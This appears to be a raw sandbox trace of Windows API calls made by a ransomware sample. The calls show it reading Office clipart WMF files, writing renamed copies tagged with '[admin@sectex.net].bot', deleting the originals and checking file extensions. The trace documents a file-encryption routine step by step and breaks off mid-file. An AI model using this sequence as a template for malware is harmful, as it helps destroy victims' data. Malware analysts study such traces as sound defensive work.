	[0147.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.553] GetLastError () returned 0x0
	[0147.553] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xeb4, lpOverlapped=0x0) returned 1
	[0147.595] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec0, lpOverlapped=0x0) returned 1
	[0147.596] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.597] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.597] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.597] CloseHandle (hObject=0x3c4) returned 1
	[0147.597] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.597] SetEndOfFile (hFile=0x398) returned 1
	[0147.599] CloseHandle (hObject=0x398) returned 1
	[0147.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.627] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf")) returned 1
	[0147.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.627] lstrlenW (lpString=".doc") returned 4
	[0147.627] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.627] lstrlenW (lpString=".docx") returned 5
	[0147.627] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.627] lstrlenW (lpString=".pdf") returned 4
	[0147.627] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.627] lstrlenW (lpString=".xls") returned 4
	[0147.627] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.627] lstrlenW (lpString=".xlsx") returned 5
	[0147.627] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.627] lstrlenW (lpString=".ppt") returned 4
	[0147.627] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.628] lstrlenW (lpString=".zip") returned 4
	[0147.628] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.628] lstrlenW (lpString=".rar") returned 4
	[0147.628] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString=".bz2") returned 4
	[0147.628] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString=".7z") returned 3
	[0147.628] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.628] lstrlenW (lpString=".dbf") returned 4
	[0147.628] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.628] lstrlenW (lpString=".1cd") returned 4
	[0147.628] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.628] lstrlenW (lpString=".jpg") returned 4
	[0147.628] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.628] lstrlenW (lpString=".doc") returned 4
	[0147.628] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString=".docx") returned 5
	[0147.628] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.628] lstrlenW (lpString=".pdf") returned 4
	[0147.628] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.628] lstrlenW (lpString=".xls") returned 4
	[0147.628] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.628] lstrlenW (lpString=".xlsx") returned 5
	[0147.628] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.628] lstrlenW (lpString=".ppt") returned 4
	[0147.628] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.629] lstrlenW (lpString=".zip") returned 4
	[0147.629] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.629] lstrlenW (lpString=".rar") returned 4
	[0147.629] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.629] lstrlenW (lpString=".bz2") returned 4
	[0147.629] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.629] lstrlenW (lpString=".7z") returned 3
	[0147.629] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.629] lstrlenW (lpString=".dbf") returned 4
	[0147.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.629] lstrlenW (lpString=".1cd") returned 4
	[0147.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63
	[0147.629] lstrlenW (lpString=".jpg") returned 4
	[0147.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.629] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.629] lstrlenW (lpString="HH00513_.WMF") returned 12
	[0147.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.631] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=818) returned 1
	[0147.631] CloseHandle (hObject=0x3a0) returned 1
	[0147.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf")) returned 0x20
	[0147.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.631] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.631] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.632] GetLastError () returned 0x0
	[0147.632] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x332, lpOverlapped=0x0) returned 1
	[0147.690] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x340, lpOverlapped=0x0) returned 1
	[0147.691] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.691] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.691] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.691] CloseHandle (hObject=0x3b8) returned 1
	[0147.691] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.691] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.696] CloseHandle (hObject=0x3a0) returned 1
	[0147.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.696] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf")) returned 1
	[0147.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.697] lstrlenW (lpString=".doc") returned 4
	[0147.697] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString=".docx") returned 5
	[0147.697] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.697] lstrlenW (lpString=".pdf") returned 4
	[0147.697] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString=".xls") returned 4
	[0147.697] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.697] lstrlenW (lpString=".xlsx") returned 5
	[0147.697] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.697] lstrlenW (lpString=".ppt") returned 4
	[0147.697] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.697] lstrlenW (lpString=".zip") returned 4
	[0147.697] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.697] lstrlenW (lpString=".rar") returned 4
	[0147.697] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString=".bz2") returned 4
	[0147.697] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString=".7z") returned 3
	[0147.697] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.697] lstrlenW (lpString=".dbf") returned 4
	[0147.697] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.697] lstrlenW (lpString=".1cd") returned 4
	[0147.697] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.697] lstrlenW (lpString=".jpg") returned 4
	[0147.698] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.698] lstrlenW (lpString=".doc") returned 4
	[0147.698] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString=".docx") returned 5
	[0147.698] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.698] lstrlenW (lpString=".pdf") returned 4
	[0147.698] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString=".xls") returned 4
	[0147.698] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.698] lstrlenW (lpString=".xlsx") returned 5
	[0147.698] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.698] lstrlenW (lpString=".ppt") returned 4
	[0147.698] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.698] lstrlenW (lpString=".zip") returned 4
	[0147.698] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.698] lstrlenW (lpString=".rar") returned 4
	[0147.698] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString=".bz2") returned 4
	[0147.698] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString=".7z") returned 3
	[0147.698] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.698] lstrlenW (lpString=".dbf") returned 4
	[0147.698] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.698] lstrlenW (lpString=".1cd") returned 4
	[0147.698] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 63
	[0147.699] lstrlenW (lpString=".jpg") returned 4
	[0147.699] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.699] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.699] lstrlenW (lpString="HH00526_.WMF") returned 12
	[0147.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.699] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=13538) returned 1
	[0147.699] CloseHandle (hObject=0x3a0) returned 1
	[0147.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf")) returned 0x20
	[0147.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.700] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.700] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.700] GetLastError () returned 0x0
	[0147.700] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x34e2, lpOverlapped=0x0) returned 1
	[0147.809] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x34f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x34f0, lpOverlapped=0x0) returned 1
	[0147.810] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.810] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.810] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.810] CloseHandle (hObject=0x3b8) returned 1
	[0147.810] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.810] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.812] CloseHandle (hObject=0x3a0) returned 1
	[0147.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.829] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf")) returned 1
	[0147.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.840] lstrlenW (lpString=".doc") returned 4
	[0147.840] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.840] lstrlenW (lpString=".docx") returned 5
	[0147.840] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.840] lstrlenW (lpString=".pdf") returned 4
	[0147.840] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.840] lstrlenW (lpString=".xls") returned 4
	[0147.840] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.840] lstrlenW (lpString=".xlsx") returned 5
	[0147.840] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.840] lstrlenW (lpString=".ppt") returned 4
	[0147.840] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.840] lstrlenW (lpString=".zip") returned 4
	[0147.840] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.840] lstrlenW (lpString=".rar") returned 4
	[0147.840] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.840] lstrlenW (lpString=".bz2") returned 4
	[0147.840] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.840] lstrlenW (lpString=".7z") returned 3
	[0147.840] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.859] lstrlenW (lpString=".dbf") returned 4
	[0147.859] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.859] lstrlenW (lpString=".1cd") returned 4
	[0147.859] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.861] lstrlenW (lpString=".jpg") returned 4
	[0147.861] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.861] lstrlenW (lpString=".doc") returned 4
	[0147.861] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.861] lstrlenW (lpString=".docx") returned 5
	[0147.861] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.862] lstrlenW (lpString=".pdf") returned 4
	[0147.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.862] lstrlenW (lpString=".xls") returned 4
	[0147.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.862] lstrlenW (lpString=".xlsx") returned 5
	[0147.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.862] lstrlenW (lpString=".ppt") returned 4
	[0147.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.862] lstrlenW (lpString=".zip") returned 4
	[0147.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.862] lstrlenW (lpString=".rar") returned 4
	[0147.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.862] lstrlenW (lpString=".bz2") returned 4
	[0147.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.862] lstrlenW (lpString=".7z") returned 3
	[0147.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.862] lstrlenW (lpString=".dbf") returned 4
	[0147.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.862] lstrlenW (lpString=".1cd") returned 4
	[0147.862] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 63
	[0147.862] lstrlenW (lpString=".jpg") returned 4
	[0147.862] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.862] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.863] lstrlenW (lpString="HH00623_.WMF") returned 12
	[0147.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.864] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=10644) returned 1
	[0147.864] CloseHandle (hObject=0x3bc) returned 1
	[0147.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf")) returned 0x20
	[0147.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.865] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.865] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
